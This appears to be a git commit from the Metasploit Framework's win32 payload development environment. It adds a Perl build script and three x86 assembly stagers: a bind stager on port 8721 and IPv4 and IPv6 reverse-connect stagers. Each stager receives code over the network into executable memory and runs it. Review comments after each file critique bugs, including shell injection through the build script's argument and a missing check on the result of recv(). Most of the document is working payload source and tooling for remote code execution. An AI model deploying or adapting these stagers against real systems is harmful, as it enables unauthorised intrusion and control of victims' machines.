Updated README, include the templates and other src
git-svn-id: file:///home/svn/framework3/trunk@5637 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
ed379dddf5
commit
7d2bb9536a
|
@ -1,7 +1,7 @@
|
|||
This directory contains the win32 payload development environment used
|
||||
for creating the payloads in version 3 of the Metasploit Framework.
|
||||
|
||||
The 'nasm' executable must be in your path to use the included build tool.
|
||||
The 'nasm' executable must be in your path to use the included build.sh tool.
|
||||
|
||||
The included 'build' script automatically creates a number of file types
|
||||
each time it used to compile a payload. These file types are:
|
||||
|
@ -13,6 +13,6 @@ each time it used to compile a payload. These file types are:
|
|||
|
||||
The PE executable templates were developed by 'rix' and used with permission.
|
||||
|
||||
To use this script, simply run ./build <name of payload>, where the name
|
||||
To use this script, simply run ./build.sh <name of payload>, where the name
|
||||
does not include the ".asm" suffix. To build win32_stage_api.asm, the
|
||||
command line would be "./build win32_stage_api".
|
||||
command line would be "./build.sh win32_stage_api".
|
||||
|
|
|
@ -0,0 +1,173 @@
|
|||
#!/usr/bin/perl
|
||||
###############
|
||||
|
||||
##
|
||||
# Name: build
|
||||
# Author: H D Moore <hdm [at] metasploit.com>
|
||||
# Description: Command-line tool for building/extracting asm payloads
|
||||
# License: GPL / Perl Artistic
|
||||
##
|
||||
|
||||
|
||||
my $name = shift();
|
||||
|
||||
if (! $name || $name =~ /\./) { print STDERR "Usage: $0 <name>\n"; exit(0); }
|
||||
|
||||
if ($name eq 'clean') {
|
||||
system("rm -f *.bin *.exe *.c *.elf");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
# Compile the asm
|
||||
unlink("$name.bin");
|
||||
system("nasm -f bin -O3 -o $name.bin $name.asm");
|
||||
|
||||
if (! -f "$name.bin") {
|
||||
exit(0);
|
||||
}
|
||||
|
||||
# Load binary
|
||||
my $bindata;
|
||||
open(X, "<$name.bin") || exit(0);
|
||||
$bindata = join('',<X>);
|
||||
close(X);
|
||||
|
||||
print "# Length: " . length($bindata) . " bytes\n";
|
||||
|
||||
|
||||
# Print out common offsets into the payload data
|
||||
my $suffix;
|
||||
my $port = index($bindata, pack("n", 8721));
|
||||
if ($port != -1) {
|
||||
print "# Port: $port\n";
|
||||
}
|
||||
|
||||
my $host = index($bindata, gethostbyname("127.0.0.1"));
|
||||
if ($host != -1) {
|
||||
print "# Host: $host\n";
|
||||
}
|
||||
|
||||
my $psize = index($bindata, pack("L", 0x12345678));
|
||||
if ($psize != -1) {
|
||||
print "# Size: $psize\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, pack("L", 0x13370000));
|
||||
if ($pstart != -1) {
|
||||
print "# Start: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, pack("L", 0x11223344));
|
||||
if ($pstart != -1) {
|
||||
print "# Alloc: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, pack("L", 0x73e2d87e));
|
||||
if ($pstart != -1) {
|
||||
print "# ExitProcess: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, pack("L", 0x4cf079fa));
|
||||
if ($pstart != -1) {
|
||||
print "# PayloadLen: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, "\x8d\x77\x15");
|
||||
if ($pstart != -1) {
|
||||
$pstart+=2;
|
||||
print "# FileStart: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, "\x88\x4f\x1a");
|
||||
if ($pstart != -1) {
|
||||
$pstart+=2;
|
||||
print "# FileEnd: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, "http");
|
||||
if ($pstart != -1) {
|
||||
print "# URL Start: $pstart\n";
|
||||
}
|
||||
|
||||
|
||||
$x = BufferPerl($bindata);
|
||||
print $x;
|
||||
|
||||
$x = BufferC($bindata);
|
||||
my $cfile;
|
||||
while(<DATA>) { $cfile .= $_; }
|
||||
|
||||
$cfile =~ s/::SHELLCODE::/$x/g;
|
||||
|
||||
open(C, ">$name.c");
|
||||
print C $cfile;
|
||||
close (C);
|
||||
|
||||
# Build PE
|
||||
open (X, ">templates/payload.bin") || die "payload.bin: $!";
|
||||
print X $bindata;
|
||||
close (X);
|
||||
|
||||
chdir("templates") || die "chdir(templates): $!";
|
||||
unlink("../$name.exe");
|
||||
system("nasm -I inc/ -f bin -o ../$name.exe win32_template.asm");
|
||||
|
||||
# Build ELF
|
||||
unlink("linux_template.o");
|
||||
system("nasm -f elf -o linux_template.o linux_template.asm");
|
||||
if (-f "linux_template.o")
|
||||
{
|
||||
system("ld -o ../$name.elf linux_template.o");
|
||||
unlink("linux_template.o");
|
||||
}
|
||||
|
||||
unlink("payload.bin");
|
||||
system("chmod 755 *.exe *.elf");
|
||||
|
||||
sub BufferPerl
|
||||
{
|
||||
my ($data, $width) = @_;
|
||||
my ($res, $count);
|
||||
|
||||
if (! $data) { return }
|
||||
if (! $width) { $width = 16 }
|
||||
|
||||
$res = '"';
|
||||
|
||||
$count = 0;
|
||||
foreach my $char (split(//, $data))
|
||||
{
|
||||
if ($count == $width)
|
||||
{
|
||||
$res .= '".' . "\n" . '"';
|
||||
$count = 0;
|
||||
}
|
||||
$res .= sprintf("\\x%.2x", ord($char));
|
||||
$count++;
|
||||
}
|
||||
if ($count) { $res .= '";' . "\n"; }
|
||||
return $res;
|
||||
}
|
||||
|
||||
sub BufferC
|
||||
{
|
||||
my ($data, $width) = @_;
|
||||
my $res = BufferPerl($data, $width);
|
||||
if (! $res) { return }
|
||||
|
||||
$res =~ s/\.//g;
|
||||
return $res;
|
||||
}
|
||||
|
||||
__DATA__
|
||||
|
||||
char code[] =
|
||||
::SHELLCODE::
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int (*funct)();
|
||||
funct = (int (*)()) code;
|
||||
(int)(*funct)();
|
||||
}
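Review bot: The final `system("chmod 755 *.exe *.elf")` runs after the `chdir("templates")` above it, but the binaries were written to `../$name.exe` and `../$name.elf`, so the glob matches nothing in templates/ and the outputs are never made executable; `system('chmod', '755', "../$name.exe", "../$name.elf")` fixes both the directory and the shell glob. The only validation of `$name` is the `/\./` check, yet it is interpolated into shell command lines for nasm, so whitespace or metacharacters in the argument reach the shell — list-form `system('nasm', '-f', 'bin', '-O3', '-o', "$name.bin", "$name.asm")` avoids that, and an anchored `/\A[\w-]+\z/` check would be simpler to reason about. Every failure path (usage error, missing `$name.bin`, failed open) calls `exit(0)`, so a broken build reports success to any caller; those should exit non-zero, and the unchecked `open(C, ">$name.c")` should die on failure. The script also lacks `use strict; use warnings;`, which would have flagged the repeated `my $pstart` declarations and the bareword, two-argument opens.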
|
|
@ -0,0 +1,203 @@
|
|||
; Title: Win32 API Loader
|
||||
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
|
||||
; Author: hdm[at]metasploit.com
|
||||
|
||||
[BITS 32]
|
||||
|
||||
global _start
|
||||
_start:
|
||||
|
||||
call LKernel32Base
|
||||
|
||||
LGetProcAddress:
|
||||
push ebx
|
||||
push ebp
|
||||
push esi
|
||||
push edi
|
||||
mov ebp, [esp + 24]
|
||||
mov eax, [ebp + 0x3c]
|
||||
mov edx, [ebp + eax + 120]
|
||||
add edx, ebp
|
||||
mov ecx, [edx + 24]
|
||||
mov ebx, [edx + 32]
|
||||
add ebx, ebp
|
||||
|
||||
LFnlp:
|
||||
jecxz LNtfnd
|
||||
dec ecx
|
||||
mov esi, [ebx + ecx * 4]
|
||||
add esi, ebp
|
||||
xor edi, edi
|
||||
cld
|
||||
|
||||
LHshlp:
|
||||
xor eax, eax
|
||||
lodsb
|
||||
cmp al, ah
|
||||
je LFnd
|
||||
ror edi, 13
|
||||
add edi, eax
|
||||
jmp short LHshlp
|
||||
|
||||
LFnd:
|
||||
cmp edi, [esp + 20]
|
||||
jnz LFnlp
|
||||
mov ebx, [edx + 36]
|
||||
add ebx, ebp
|
||||
mov cx, [ebx + 2 * ecx]
|
||||
mov ebx, [edx + 28]
|
||||
add ebx, ebp
|
||||
mov eax, [ebx + 4 * ecx]
|
||||
add eax, ebp
|
||||
jmp short LDone
|
||||
|
||||
LNtfnd:
|
||||
xor eax, eax
|
||||
|
||||
LDone:
|
||||
pop edi
|
||||
pop esi
|
||||
pop ebp
|
||||
pop ebx
|
||||
ret 8
|
||||
|
||||
LKernel32Base:
|
||||
pop esi
|
||||
push byte 0x30
|
||||
pop ecx
|
||||
mov ebx, [fs:ecx]
|
||||
mov ebx, [ebx + 0x0c]
|
||||
mov ebx, [ebx + 0x1c]
|
||||
mov ebx, [ebx]
|
||||
mov ebx, [ebx + 0x08]
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push 0xec0e4e8e ; LoadLibraryA
|
||||
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
|
||||
mov edi, eax
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push 0x91afca54 ; VirtualAlloc
|
||||
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
|
||||
|
||||
; ebx = kernel32.dll base
|
||||
; esi = LGetProcAddress
|
||||
; edi = LoadLibraryA
|
||||
; eax = VirtualAlloc
|
||||
|
||||
sub esp, 0x100
|
||||
push eax ; [ebp + 12] = VirtualAlloc
|
||||
push edi ; [ebp + 8] = LoadLibraryA
|
||||
push esi ; [ebp + 4] = LGetProcAddress
|
||||
push ebx ; [ebp + 0] = kernel32.dll base
|
||||
|
||||
mov ebp, esp
|
||||
call LLoadWinsock
|
||||
|
||||
%define FN_RECV [ebp + 24]
|
||||
%define FN_SEND [ebp + 28]
|
||||
%define FN_ACCEPT [ebp + 32]
|
||||
%define FN_BIND [ebp + 36]
|
||||
%define FN_LISTEN [ebp + 40]
|
||||
%define FN_WSASOCK [ebp + 44]
|
||||
%define FN_WSASTART [ebp + 48]
|
||||
|
||||
LWSDataSegment:
|
||||
;========================
|
||||
dd 0x190 ; used by wsastartup
|
||||
dd 0xe71819b6 ; recv [ebp + 24]
|
||||
dd 0xe97019a4 ; send [ebp + 28]
|
||||
dd 0x498649e5 ; accept [ebp + 32]
|
||||
dd 0xc7701aa4 ; bind [ebp + 36]
|
||||
dd 0xe92eada4 ; listen [ebp + 40]
|
||||
dd 0xadf509d9 ; WSASocketA [ebp + 44]
|
||||
dd 0x3bfcedcb ; WSAStartup [ebp + 48]
|
||||
db "WS2_32", 0x00
|
||||
;========================
|
||||
|
||||
LLoadWinsock:
|
||||
pop ebx ; save address to data in ebx
|
||||
lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"
|
||||
push ecx ; push address of "WS2_32.DLL"
|
||||
call edi ; call LoadLibraryA("WS2_32.DLL")
|
||||
mov edi, ebx ; store base of data section in edi
|
||||
mov ebx, eax ; store base of winsock in ebx
|
||||
lea esi, [ebp + 20] ; store base of function table
|
||||
push byte 0x07 ; load five functions by hash
|
||||
pop ecx ; configure the counter
|
||||
|
||||
Looper:
|
||||
push ecx ; save the counter
|
||||
push ebx ; dll handle
|
||||
push dword [edi + ecx * 4] ; function hash value
|
||||
call [ebp + 4] ; find the address
|
||||
pop ecx ; restore the counter
|
||||
mov [esi + ecx * 4], eax ; stack segment to store addresses
|
||||
loop Looper
|
||||
|
||||
LWSAStartup: ; WSAStartup (0x101, DATA)
|
||||
sub esp, [edi]
|
||||
push esp
|
||||
push dword [edi]
|
||||
call FN_WSASTART
|
||||
xor eax, eax
|
||||
|
||||
LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
|
||||
push eax
|
||||
push eax
|
||||
push eax
|
||||
push eax
|
||||
inc eax
|
||||
push eax
|
||||
inc eax
|
||||
push eax
|
||||
call FN_WSASOCK
|
||||
mov edi, eax
|
||||
|
||||
LBind:
|
||||
xor ebx, ebx
|
||||
push ebx
|
||||
push ebx
|
||||
push dword 0x11220002 ; port 8721
|
||||
mov eax, esp
|
||||
push byte 0x10 ; length
|
||||
push eax
|
||||
push edi
|
||||
call FN_BIND
|
||||
|
||||
LListen:
|
||||
push ebx
|
||||
push edi
|
||||
call FN_LISTEN
|
||||
|
||||
LAccept:
|
||||
push ebx
|
||||
push esp
|
||||
push edi
|
||||
call FN_ACCEPT
|
||||
mov edi, eax
|
||||
|
||||
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
|
||||
|
||||
push byte 0x40
|
||||
pop esi
|
||||
push esi ; PAGE_EXECUTE_READWRITE=0x40
|
||||
|
||||
shl esi, 6 ; MEM_COMMIT=0x1000
|
||||
push esi
|
||||
|
||||
shl esi, 8 ; 1MB
|
||||
push esi
|
||||
|
||||
push byte 0x00 ; NULL
|
||||
call [ebp+12]
|
||||
mov ebx, eax
|
||||
|
||||
|
||||
LRecvLength: ; recv(s, buff, 4, 0)
|
||||
push byte 0x00 ; flags
|
||||
push 4096 ; length
|
||||
push ebx ; buffer
|
||||
push dword edi ; socket
|
||||
call FN_RECV ; recv()
|
||||
call ebx
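Review bot: `call ebx` at the end of LRecvLength jumps into the VirtualAlloc'd buffer without checking what `recv()` returned, so a closed connection or SOCKET_ERROR (eax of 0 or -1) executes the untouched allocation; a `test eax, eax` / `jle` to a bail-out path before the call would turn that into a clean failure instead of a crash. The label comment says `recv(s, buff, 4, 0)` but the code pushes 4096 into a 1 MB buffer, and a single recv() on a TCP stream can return fewer bytes than the stage, so a stage larger than one read is executed partially; if that is the intended contract for this stager the comment should at least read `; recv(s, buff, 4096, 0)` and say so. The comment `push byte 0x07 ; load five functions by hash` is wrong — seven hashes follow the 0x190 word in LWSDataSegment and seven slots are filled. It is also worth documenting at LBind that the listener on `0x11220002` (INADDR_ANY, port 8721) accepts and executes code from whichever client connects first, with no authentication.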
|
|
@ -0,0 +1,255 @@
|
|||
; Title: Windows Reverse Connect Stager (NX, IPv6)
|
||||
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista
|
||||
; Author: Metasploit LLC
|
||||
|
||||
[BITS 32]
|
||||
|
||||
global _start
|
||||
_start:
|
||||
|
||||
call LKernel32Base
|
||||
|
||||
LGetProcAddress:
|
||||
push ebx
|
||||
push ebp
|
||||
push esi
|
||||
push edi
|
||||
mov ebp, [esp + 24]
|
||||
mov eax, [ebp + 0x3c]
|
||||
mov edx, [ebp + eax + 120]
|
||||
add edx, ebp
|
||||
mov ecx, [edx + 24]
|
||||
mov ebx, [edx + 32]
|
||||
add ebx, ebp
|
||||
|
||||
LFnlp:
|
||||
jecxz LNtfnd
|
||||
dec ecx
|
||||
mov esi, [ebx + ecx * 4]
|
||||
add esi, ebp
|
||||
xor edi, edi
|
||||
cld
|
||||
|
||||
LHshlp:
|
||||
xor eax, eax
|
||||
lodsb
|
||||
cmp al, ah
|
||||
je LFnd
|
||||
ror edi, 13
|
||||
add edi, eax
|
||||
jmp short LHshlp
|
||||
|
||||
LFnd:
|
||||
cmp edi, [esp + 20]
|
||||
jnz LFnlp
|
||||
mov ebx, [edx + 36]
|
||||
add ebx, ebp
|
||||
mov cx, [ebx + 2 * ecx]
|
||||
mov ebx, [edx + 28]
|
||||
add ebx, ebp
|
||||
mov eax, [ebx + 4 * ecx]
|
||||
add eax, ebp
|
||||
jmp short LDone
|
||||
|
||||
LNtfnd:
|
||||
xor eax, eax
|
||||
|
||||
LDone:
|
||||
pop edi
|
||||
pop esi
|
||||
pop ebp
|
||||
pop ebx
|
||||
ret 8
|
||||
|
||||
LKernel32Base:
|
||||
pop esi
|
||||
push byte 0x30
|
||||
pop ecx
|
||||
mov ebx, [fs:ecx]
|
||||
mov ebx, [ebx + 0x0c]
|
||||
mov ebx, [ebx + 0x1c]
|
||||
mov ebx, [ebx]
|
||||
mov ebx, [ebx + 0x08]
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push dword 0xec0e4e8e ; LoadLibraryA
|
||||
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
|
||||
mov edi, eax
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push dword 0x91afca54 ; VirtualAlloc
|
||||
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
|
||||
|
||||
; ebx = kernel32.dll base
|
||||
; esi = LGetProcAddress
|
||||
; edi = LoadLibraryA
|
||||
; eax = VirtualAlloc
|
||||
|
||||
LBootWinsock:
|
||||
sub esp, 0x100
|
||||
push eax ; [ebp + 12] = VirtualAlloc
|
||||
push edi ; [ebp + 8] = LoadLibraryA
|
||||
push esi ; [ebp + 4] = LGetProcAddress
|
||||
push ebx ; [ebp + 0] = kernel32.dll base
|
||||
|
||||
mov ebp, esp
|
||||
call LLoadWinsock
|
||||
|
||||
%define FN_RECV [ebp + 24]
|
||||
%define FN_SEND [ebp + 28]
|
||||
%define FN_CONNECT [ebp + 32]
|
||||
%define FN_WSASOCK [ebp + 36]
|
||||
%define FN_WSASTART [ebp + 40]
|
||||
|
||||
LWSDataSegment:
|
||||
;========================
|
||||
dd 0x190 ; used by wsastartup
|
||||
dd 0xe71819b6 ; recv [ebp + 24]
|
||||
dd 0xe97019a4 ; send [ebp + 28]
|
||||
dd 0x60aaf9ec ; connect [ebp + 32]
|
||||
dd 0xadf509d9 ; WSASocketA [ebp + 36]
|
||||
dd 0x3bfcedcb ; WSAStartup [ebp + 40]
|
||||
db "WS2_32", 0x00
|
||||
;========================
|
||||
|
||||
LLoadWinsock:
|
||||
pop ebx ; save address to data in ebx
|
||||
lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
|
||||
push ecx ; push address of "WS2_32.DLL"
|
||||
call edi ; call LoadLibraryA("WS2_32.DLL")
|
||||
mov edi, ebx ; store base of data section in edi
|
||||
mov ebx, eax ; store base of winsock in ebx
|
||||
lea esi, [ebp + 20] ; store base of function table
|
||||
push byte 0x05 ; load five functions by hash
|
||||
pop ecx ; configure the counter
|
||||
|
||||
Looper:
|
||||
push ecx ; save the counter
|
||||
push ebx ; dll handle
|
||||
push dword [edi + ecx * 4] ; function hash value
|
||||
call [ebp + 4] ; find the address
|
||||
pop ecx ; restore the counter
|
||||
mov [esi + ecx * 4], eax ; stack segment to store addresses
|
||||
loop Looper
|
||||
|
||||
LWSAStartup: ; WSAStartup (0x0202, DATA)
|
||||
sub esp, [edi]
|
||||
push esp
|
||||
push dword 0x0202
|
||||
call FN_WSASTART
|
||||
xor eax, eax
|
||||
|
||||
LWSASocketA: ; WSASocketA (23,1,6,0,0,0)
|
||||
; dwFlags
|
||||
push eax
|
||||
|
||||
; RESERVED
|
||||
push eax
|
||||
|
||||
; PROTOCOL INFO
|
||||
push eax
|
||||
|
||||
; PROTOCOL: IPPROTO_TCP
|
||||
push byte 6
|
||||
|
||||
; TYPE: SOCK_STREAM
|
||||
push byte 1
|
||||
|
||||
; FAMILY: AF_INET6
|
||||
push byte 23
|
||||
|
||||
; WSASocket()
|
||||
call FN_WSASOCK
|
||||
mov edi, eax
|
||||
|
||||
; [ebp + 0] = kernel32.dll base
|
||||
; [ebp + 4] = LGetProcAddress
|
||||
; [ebp + 8] = LoadLibraryA
|
||||
; [ebp + 12] = VirtualAlloc
|
||||
; [ebp + 24] = recv
|
||||
; [ebp + 28] = send
|
||||
; [ebp + 32] = accept
|
||||
; [ebp + 36] = bind
|
||||
; [ebp + 40] = connect
|
||||
; [ebp + 44] = WSASocketA
|
||||
; [ebp + 48] = WSAStartup
|
||||
; [ebp + 52] = Payload Length
|
||||
|
||||
LConnect:
|
||||
call LGotAddress
|
||||
|
||||
LGetAddress:
|
||||
|
||||
; struct sockaddr_in6 {
|
||||
; short sin6_family;
|
||||
; u_short sin6_port;
|
||||
; u_long sin6_flowinfo;
|
||||
; struct in6_addr sin6_addr;
|
||||
; u_long sin6_scope_id;
|
||||
;}
|
||||
|
||||
; sin6_family
|
||||
db 0x17
|
||||
db 0x00
|
||||
|
||||
; sin6_port
|
||||
db 0xff
|
||||
db 0xff
|
||||
|
||||
dd 0x00000000 ; sin6_flowinfo
|
||||
|
||||
; fe80000000000000021b63fffe98bf36
|
||||
db 0xfe
|
||||
db 0x80
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x02
|
||||
db 0x1b
|
||||
db 0x63
|
||||
db 0xff
|
||||
db 0xfe
|
||||
db 0x98
|
||||
db 0xbf
|
||||
db 0x36
|
||||
|
||||
dd 0x00000000 ; sin6_scope_id
|
||||
|
||||
LGotAddress:
|
||||
pop ecx
|
||||
push byte 28 ; address length
|
||||
push ecx
|
||||
push dword edi
|
||||
call dword FN_CONNECT
|
||||
|
||||
; reconnect on failure
|
||||
; test eax, eax
|
||||
; jne short LConnect
|
||||
|
||||
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
|
||||
|
||||
push byte 0x40
|
||||
pop esi
|
||||
push esi ; PAGE_EXECUTE_READWRITE=0x40
|
||||
|
||||
shl esi, 6 ; MEM_COMMIT=0x1000
|
||||
push esi
|
||||
|
||||
shl esi, 8 ; 1MB
|
||||
push esi
|
||||
|
||||
push byte 0x00 ; NULL
|
||||
call [ebp+12]
|
||||
mov ebx, eax
|
||||
|
||||
LRecvLength: ; recv(s, buff, 4, 0)
|
||||
push byte 0x00 ; flags
|
||||
push esi ; length
|
||||
push ebx ; buffer
|
||||
push dword edi ; socket
|
||||
call FN_RECV ; recv()
|
||||
call ebx
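Review bot: The register-table comment block above LConnect (`[ebp + 32] = accept` through `[ebp + 52] = Payload Length`) does not match this file's `%define` table and LWSDataSegment, where connect is `[ebp + 32]`, WSASocketA `[ebp + 36]`, WSAStartup `[ebp + 40]` and there is no accept, bind or payload-length slot; it looks carried over from the bind stager and should be rewritten to list the five entries actually loaded. The target is baked into LGetAddress as `fe80::21b:63ff:fe98:bf36` port 0xffff with a `sin6_scope_id` of 0; a link-local address normally needs a non-zero scope id (the interface index) to be usable, and the build script on this page only searches for the 127.0.0.1/8721 markers, so it will report no offset for this sockaddr_in6 — presumably the framework patches it by other means, but that assumption deserves a comment next to the structure. With the `; jne short LConnect` retry commented out, a failed connect() falls through to `recv()` on an unconnected socket and then `call ebx` into the untouched allocation, so at minimum a `test eax, eax` after `call FN_RECV` should guard the jump.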
|
||||
|
|
@ -0,0 +1,203 @@
|
|||
; Title: Win32 API Loader
|
||||
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista,
|
||||
; Author: hdm[at]metasploit.com
|
||||
|
||||
[BITS 32]
|
||||
|
||||
global _start
|
||||
_start:
|
||||
|
||||
call LKernel32Base
|
||||
|
||||
LGetProcAddress:
|
||||
push ebx
|
||||
push ebp
|
||||
push esi
|
||||
push edi
|
||||
mov ebp, [esp + 24]
|
||||
mov eax, [ebp + 0x3c]
|
||||
mov edx, [ebp + eax + 120]
|
||||
add edx, ebp
|
||||
mov ecx, [edx + 24]
|
||||
mov ebx, [edx + 32]
|
||||
add ebx, ebp
|
||||
|
||||
LFnlp:
|
||||
jecxz LNtfnd
|
||||
dec ecx
|
||||
mov esi, [ebx + ecx * 4]
|
||||
add esi, ebp
|
||||
xor edi, edi
|
||||
cld
|
||||
|
||||
LHshlp:
|
||||
xor eax, eax
|
||||
lodsb
|
||||
cmp al, ah
|
||||
je LFnd
|
||||
ror edi, 13
|
||||
add edi, eax
|
||||
jmp short LHshlp
|
||||
|
||||
LFnd:
|
||||
cmp edi, [esp + 20]
|
||||
jnz LFnlp
|
||||
mov ebx, [edx + 36]
|
||||
add ebx, ebp
|
||||
mov cx, [ebx + 2 * ecx]
|
||||
mov ebx, [edx + 28]
|
||||
add ebx, ebp
|
||||
mov eax, [ebx + 4 * ecx]
|
||||
add eax, ebp
|
||||
jmp short LDone
|
||||
|
||||
LNtfnd:
|
||||
xor eax, eax
|
||||
|
||||
LDone:
|
||||
pop edi
|
||||
pop esi
|
||||
pop ebp
|
||||
pop ebx
|
||||
ret 8
|
||||
|
||||
LKernel32Base:
|
||||
pop esi
|
||||
push byte 0x30
|
||||
pop ecx
|
||||
mov ebx, [fs:ecx]
|
||||
mov ebx, [ebx + 0x0c]
|
||||
mov ebx, [ebx + 0x1c]
|
||||
mov ebx, [ebx]
|
||||
mov ebx, [ebx + 0x08]
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push 0xec0e4e8e ; LoadLibraryA
|
||||
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
|
||||
mov edi, eax
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push 0x91afca54 ; VirtualAlloc
|
||||
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
|
||||
|
||||
; ebx = kernel32.dll base
|
||||
; esi = LGetProcAddress
|
||||
; edi = LoadLibraryA
|
||||
; eax = VirtualAlloc
|
||||
|
||||
LBootWinsock:
|
||||
sub esp, 0x100
|
||||
push eax ; [ebp + 12] = VirtualAlloc
|
||||
push edi ; [ebp + 8] = LoadLibraryA
|
||||
push esi ; [ebp + 4] = LGetProcAddress
|
||||
push ebx ; [ebp + 0] = kernel32.dll base
|
||||
|
||||
mov ebp, esp
|
||||
call LLoadWinsock
|
||||
|
||||
%define FN_RECV [ebp + 24]
|
||||
%define FN_SEND [ebp + 28]
|
||||
%define FN_CONNECT [ebp + 32]
|
||||
%define FN_WSASOCK [ebp + 36]
|
||||
%define FN_WSASTART [ebp + 40]
|
||||
|
||||
LWSDataSegment:
|
||||
;========================
|
||||
dd 0x190 ; used by wsastartup
|
||||
dd 0xe71819b6 ; recv [ebp + 24]
|
||||
dd 0xe97019a4 ; send [ebp + 28]
|
||||
dd 0x60aaf9ec ; connect [ebp + 32]
|
||||
dd 0xadf509d9 ; WSASocketA [ebp + 36]
|
||||
dd 0x3bfcedcb ; WSAStartup [ebp + 40]
|
||||
db "WS2_32", 0x00
|
||||
;========================
|
||||
|
||||
LLoadWinsock:
|
||||
pop ebx ; save address to data in ebx
|
||||
lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
|
||||
push ecx ; push address of "WS2_32.DLL"
|
||||
call edi ; call LoadLibraryA("WS2_32.DLL")
|
||||
mov edi, ebx ; store base of data section in edi
|
||||
mov ebx, eax ; store base of winsock in ebx
|
||||
lea esi, [ebp + 20] ; store base of function table
|
||||
push byte 0x05 ; load five functions by hash
|
||||
pop ecx ; configure the counter
|
||||
|
||||
Looper:
|
||||
push ecx ; save the counter
|
||||
push ebx ; dll handle
|
||||
push dword [edi + ecx * 4] ; function hash value
|
||||
call [ebp + 4] ; find the address
|
||||
pop ecx ; restore the counter
|
||||
mov [esi + ecx * 4], eax ; stack segment to store addresses
|
||||
loop Looper
|
||||
|
||||
LWSAStartup: ; WSAStartup (0x101, DATA)
|
||||
sub esp, [edi]
|
||||
push esp
|
||||
push dword [edi]
|
||||
call FN_WSASTART
|
||||
xor eax, eax
|
||||
|
||||
LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
|
||||
push eax
|
||||
push eax
|
||||
push eax
|
||||
push eax
|
||||
inc eax
|
||||
push eax
|
||||
inc eax
|
||||
push eax
|
||||
call FN_WSASOCK
|
||||
mov edi, eax
|
||||
|
||||
; [ebp + 0] = kernel32.dll base
|
||||
; [ebp + 4] = LGetProcAddress
|
||||
; [ebp + 8] = LoadLibraryA
|
||||
; [ebp + 12] = VirtualAlloc
|
||||
; [ebp + 24] = recv
|
||||
; [ebp + 28] = send
|
||||
; [ebp + 32] = accept
|
||||
; [ebp + 36] = bind
|
||||
; [ebp + 40] = connect
|
||||
; [ebp + 44] = WSASocketA
|
||||
; [ebp + 48] = WSAStartup
|
||||
; [ebp + 52] = Payload Length
|
||||
|
||||
LConnect:
|
||||
push 0x0100007f ; host: 127.0.0.1
|
||||
push 0x11220002 ; port: 8721
|
||||
mov ecx, esp
|
||||
push byte 0x10
|
||||
push ecx
|
||||
push dword edi
|
||||
call dword FN_CONNECT
|
||||
|
||||
; reconnect on failure
|
||||
; test eax, eax
|
||||
; jne short LConnect
|
||||
|
||||
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
|
||||
|
||||
push byte 0x40
|
||||
pop esi
|
||||
push esi ; PAGE_EXECUTE_READWRITE=0x40
|
||||
|
||||
shl esi, 6 ; MEM_COMMIT=0x1000
|
||||
push esi
|
||||
|
||||
shl esi, 8 ; 1MB
|
||||
push esi
|
||||
|
||||
push byte 0x00 ; NULL
|
||||
call [ebp+12]
|
||||
mov ebx, eax
|
||||
|
||||
LRecvLength: ; recv(s, buff, 4, 0)
|
||||
push byte 0x00 ; flags
|
||||
push esi ; length
|
||||
push ebx ; buffer
|
||||
push dword edi ; socket
|
||||
call FN_RECV ; recv()
|
||||
call ebx
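Review bot: With `; test eax, eax` / `; jne short LConnect` commented out, a refused connection is neither retried nor detected: execution continues into `recv()` on an unconnected socket, and `call ebx` then jumps into the untouched VirtualAlloc buffer, so the process crashes rather than exiting; either re-enable the retry or check eax after `call FN_RECV` before the jump. The register-table comment above LConnect lists accept, bind and a payload-length slot at `[ebp + 32]`…`[ebp + 52]`, but this file's `%define`s put connect at `[ebp + 32]`, WSASocketA at `[ebp + 36]` and WSAStartup at `[ebp + 40]` and load only five hashes, so the table is stale and misleading. `push 0x0100007f ; host: 127.0.0.1` and `push 0x11220002 ; port: 8721` are exactly the markers the build script searches for, which is worth stating (`; placeholder — the build script reports this offset so the framework can patch it`) so nobody "fixes" the loopback address. The Platforms line ends in a stray comma after `Windows Vista`, and the kernel32 lookup in LKernel32Base assumes kernel32 is the second entry of InInitializationOrderModuleList, an ordering that is presumably version-dependent and deserves a comment.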
|
||||
|
|
@ -0,0 +1,3 @@
|
|||
These include files were pulled from rix's site:
|
||||
|
||||
http://www.devhell.org/~rix/
|
|
@ -0,0 +1,309 @@
|
|||
